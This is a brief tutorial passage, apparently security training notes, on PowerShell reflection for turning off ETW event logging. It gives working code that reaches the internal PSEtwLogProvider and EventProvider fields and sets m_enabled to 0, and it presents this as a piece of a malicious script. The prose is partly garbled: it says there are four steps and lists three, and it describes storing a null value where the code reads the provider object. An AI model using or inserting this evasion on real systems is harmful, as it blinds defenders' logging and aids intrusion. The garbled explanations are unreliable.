Powershell reflection
In the context of ETW, an attacker can reflect the ETW event provider assembly and set the m_enabled field to $null.
At a high level, PowerShell reflection can be broken up into four steps:
Obtain
.NETassembly forPSEtwLogProvider.Store a null value for
etwProviderfield.Set the field for
m_enabledto previously stored value.
Code
Obtain the type for the PSEtwLogProvider assembly and store it to access its internal fields in the next step:
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
Store a value ($null) from the previous assembly:
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
Compile the steps together to overwrite the m_enabled field with the stored value:
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
Compiled together, these steps can be appended to make a malicious PowerShell script.